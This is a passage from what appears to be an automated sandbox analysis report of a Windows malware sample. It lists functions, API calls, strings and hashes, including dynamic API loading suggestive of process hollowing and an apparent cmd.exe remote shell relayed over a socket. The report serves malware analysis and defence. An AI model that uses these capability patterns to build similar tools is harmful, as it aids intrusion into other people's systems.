4461f6 47088 44062d 20 API calls _free 47072->47088 47073 4461e1 RtlAllocateHeap 47075 4461f4 47073->47075 47073->47077 47075->46900 47077->47072 47077->47073 47087 443001 7 API calls 2 library calls 47077->47087 47079 4020bf 47078->47079 47089 4023ce 47079->47089 47081 4020ca 47093 40250a 47081->47093 47083 4020d9 47083->46903 47085 4020b7 28 API calls 47084->47085 47086 406e27 47085->47086 47086->46910 47087->47077 47088->47075 47090 402428 47089->47090 47091 4023d8 47089->47091 47090->47081 47091->47090 47100 4027a7 11 API calls std::_Deallocate 47091->47100 47094 40251a 47093->47094 47095 402520 47094->47095 47096 402535 47094->47096 47101 402569 47095->47101 47111 4028e8 28 API calls 47096->47111 47099 402533 47099->47083 47100->47090 47112 402888 47101->47112 47103 40257d 47104 402592 47103->47104 47105 4025a7 47103->47105 47117 402a34 22 API calls 47104->47117 47119 4028e8 28 API calls 47105->47119 47108 40259b 47118 4029da 22 API calls 47108->47118 47110 4025a5 47110->47099 47111->47099 47113 402890 47112->47113 47114 402898 47113->47114 47120 402ca3 22 API calls 47113->47120 47114->47103 47117->47108 47118->47110 47119->47110 47122 4020e7 47121->47122 47123 4023ce 11 API calls 47122->47123 47124 4020f2 47123->47124 47124->46938 47125->46938 47126->46938 47127->46927 47128->46919 47129->46942 47130->46947 47131->46945 47132->46955 47133->46955 47143 412829 61 API calls 47140->47143 47145 443248 _Atexit 47144->47145 47146 443396 _Atexit GetModuleHandleW 47145->47146 47154 443260 47145->47154 47148 443254 47146->47148 47148->47154 47178 4433da GetModuleHandleExW 47148->47178 47149 443268 47153 4432dd 47149->47153 47163 443306 47149->47163 47186 443ff0 20 API calls _Atexit 47149->47186 47157 4432f5 47153->47157 47187 444276 5 API calls ___crtLCMapStringA 47153->47187 47166 445909 EnterCriticalSection 47154->47166 47155 443323 47170 443355 47155->47170 47156 44334f 47189 4577a9 5 API calls ___crtLCMapStringA 47156->47189 47188 444276 5 API calls ___crtLCMapStringA 47157->47188 47167 443346 47163->47167 47166->47149 47190 445951 LeaveCriticalSection 47167->47190 47169 44331f 47169->47155 47169->47156 47191 448d49 47170->47191 47173 443383 47176 4433da _Atexit 8 API calls 47173->47176 47174 443363 GetPEB 47174->47173 47175 443373 GetCurrentProcess TerminateProcess 47174->47175 47175->47173 47177 44338b ExitProcess 47176->47177 47179 443404 GetProcAddress 47178->47179 47180 443427 47178->47180 47183 443419 47179->47183 47181 443436 47180->47181 47182 44342d FreeLibrary 47180->47182 47184 43502b ___crtLCMapStringA 5 API calls 47181->47184 47182->47181 47183->47180 47185 443440 47184->47185 47185->47154 47186->47153 47187->47157 47188->47163 47190->47169 47192 448d64 47191->47192 47193 448d6e 47191->47193 47195 43502b ___crtLCMapStringA 5 API calls 47192->47195 47197 44854a 47193->47197 47196 44335f 47195->47196 47196->47173 47196->47174 47198 44857a 47197->47198 47201 448576 47197->47201 47198->47192 47199 44859a 47199->47198 47202 4485a6 GetProcAddress 47199->47202 47201->47198 47201->47199 47204 4485e6 47201->47204 47203 4485b6 __crt_fast_encode_pointer 47202->47203 47203->47198 47205 448607 LoadLibraryExW 47204->47205 47210 4485fc 47204->47210 47206 448624 GetLastError 47205->47206 47207 44863c 47205->47207 47206->47207 47208 44862f LoadLibraryExW 47206->47208 47209 448653 FreeLibrary 47207->47209 47207->47210 47208->47207 47209->47210 47210->47201

                                                                                                  Executed Functions

                                                                                                  Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                                                  • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                                                  • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                  • API String ID: 4236061018-3687161714
                                                                                                  • Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                  • Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
                                                                                                  • Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                  • Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE
                                                                                                  Function 00443355 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002,00000000), ref: 00443376
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002,00000000), ref: 0044337D
                                                                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                  • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                                                                  • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                                                                  • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                                                                  Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474F08,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E38
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E43
                                                                                                  • CloseHandle.KERNELBASE(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E4C
                                                                                                  • closesocket.WS2_32(?), ref: 00404E5A
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404E91
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EA2
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EA9
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EBA
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EBF
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404EC4
                                                                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404ED1
                                                                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404ED6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                  • String ID:
                                                                                                  • API String ID: 3658366068-0
                                                                                                  • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                  • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58
                                                                                                  Function 004485E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 22 4485e6-4485fa 23 448607-448622 LoadLibraryExW 22->23 24 4485fc-448605 22->24 26 448624-44862d GetLastError 23->26 27 44864b-448651 23->27 25 44865e-448660 24->25 28 44863c 26->28 29 44862f-44863a LoadLibraryExW 26->29 30 448653-448654 FreeLibrary 27->30 31 44865a 27->31 32 44863e-448640 28->32 29->32 30->31 33 44865c-44865d 31->33 32->27 34 448642-448649 32->34 33->25 34->33
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                  • GetLastError.KERNEL32(?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3177248105-0
                                                                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                  Function 0040D0A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 35 40d0a4-40d0d0 call 401fab CreateMutexA GetLastError
                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastMutex
                                                                                                  • String ID: 0SG
                                                                                                  • API String ID: 1925916568-2718230054
                                                                                                  • Opcode ID: aba24bfd7e8b808837b934fb3074bb655e41bd047bfda9aafcf34366fa62f390
                                                                                                  • Instruction ID: 897831e38bae895769414ba5eaefcaa992d87aaaa8244aa01aad5f1db7de32a1
                                                                                                  • Opcode Fuzzy Hash: aba24bfd7e8b808837b934fb3074bb655e41bd047bfda9aafcf34366fa62f390
                                                                                                  • Instruction Fuzzy Hash: 62D012B0614301EBDB0467709C5975936559B44702F50487AB50BD95F1CBFC88D08519
                                                                                                  Function 0044854A Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 46 44854a-448574 47 448576-448578 46->47 48 4485df 46->48 49 44857e-448584 47->49 50 44857a-44857c 47->50 51 4485e1-4485e5 48->51 52 448586-448588 call 4485e6 49->52 53 4485a0 49->53 50->51 56 44858d-448590 52->56 55 4485a2-4485a4 53->55 57 4485a6-4485b4 GetProcAddress 55->57 58 4485cf-4485dd 55->58 59 4485c1-4485c7 56->59 60 448592-448598 56->60 61 4485b6-4485bf call 434591 57->61 62 4485c9 57->62 58->48 59->55 60->52 64 44859a 60->64 61->50 62->58 64->53
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004485AA
                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 2279764990-0
                                                                                                  • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                  • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                                                                  • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                                                                  • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                                                                  Function 00450154 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 66 450154-450161 call 445b74 68 450166-450171 66->68 69 450177-45017f 68->69 70 450173-450175 68->70 71 4501bf-4501cd call 446802 69->71 72 450181-450185 69->72 70->71 73 450187-4501b9 call 448b04 72->73 78 4501bb-4501be 73->78 78->71
                                                                                                  APIs
                                                                                                    • Part of subcall function 00445B74: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                  • _free.LIBCMT ref: 004501C0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 614378929-0
                                                                                                  • Opcode ID: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                                                  • Instruction ID: 1bf88885f7a62dfe3e195aa205353632c6f85cb380d5d404dcdd82bf2c99678c
                                                                                                  • Opcode Fuzzy Hash: 60f99f4f74d771fb4a1326b0b926bb5a841854500e0a6ddc8464f8a9dc27050b
                                                                                                  • Instruction Fuzzy Hash: DB014976200744ABE731CF6ACC42D5AFBD8EB85370F25062EE58483281EB34A909C779
                                                                                                  Function 00445B74 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 79 445b74-445b7f 80 445b81-445b8b 79->80 81 445b8d-445b93 79->81 80->81 82 445bc1-445bcc call 44062d 80->82 83 445b95-445b96 81->83 84 445bac-445bbd RtlAllocateHeap 81->84 89 445bce-445bd0 82->89 83->84 85 445bbf 84->85 86 445b98-445b9f call 4455c6 84->86 85->89 86->82 92 445ba1-445baa call 443001 86->92 92->82 92->84
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044834A,00000001,00000364,?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000), ref: 00445BB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                  • Instruction ID: ef76d3429b2572ee2e16b707a9c356192af24cfd4e901c13b73aaad13af6506a
                                                                                                  • Opcode Fuzzy Hash: ce26be8ca3846e5000c6f53c40b97d329a66d538f9906bf99632d42dae41b906
                                                                                                  • Instruction Fuzzy Hash: BEF0B431500F65ABBF222E22AC05E5B3769DB81770B14412BB914EA286CA38FC0186AC
                                                                                                  Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 95 4461b8-4461c4 96 4461f6-446201 call 44062d 95->96 97 4461c6-4461c8 95->97 105 446203-446205 96->105 98 4461e1-4461f2 RtlAllocateHeap 97->98 99 4461ca-4461cb 97->99 101 4461f4 98->101 102 4461cd-4461d4 call 4455c6 98->102 99->98 101->105 102->96 107 4461d6-4461df call 443001 102->107 107->96 107->98
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                  • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                  • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                  • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF

                                                                                                  Non-executed Functions

                                                                                                  Function 0040569A Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 278pipesleepfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                  • CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                  • CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
                                                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0,004660D0,00000062,004660B4), ref: 004059E4
                                                                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                  • String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
                                                                                                  • API String ID: 2994406822-3565532687
                                                                                                  • Opcode ID: 9eae926a2dc2bae5b7f9c4cce2b635ca3c1512e006286bd2a094b65077cd4643
                                                                                                  • Instruction ID: efba9956b6c01968ba48be3e84054341744464a70a9fb060b5e58b4ef4e39929
                                                                                                  • Opcode Fuzzy Hash: 9eae926a2dc2bae5b7f9c4cce2b635ca3c1512e006286bd2a094b65077cd4643
                                                                                                  • Instruction Fuzzy Hash: ED91B271600604AFD711FB35AD41A6B3AAAEB84344F01443FF549A72E2DB7D9C488F6D
                                                                                                  Function 00407CD2 Relevance: 42.8, APIs: 10, Strings: 14, Instructions: 835filesleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EF0,?), ref: 0041C37D
                                                                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EF0,?), ref: 0041C3AD
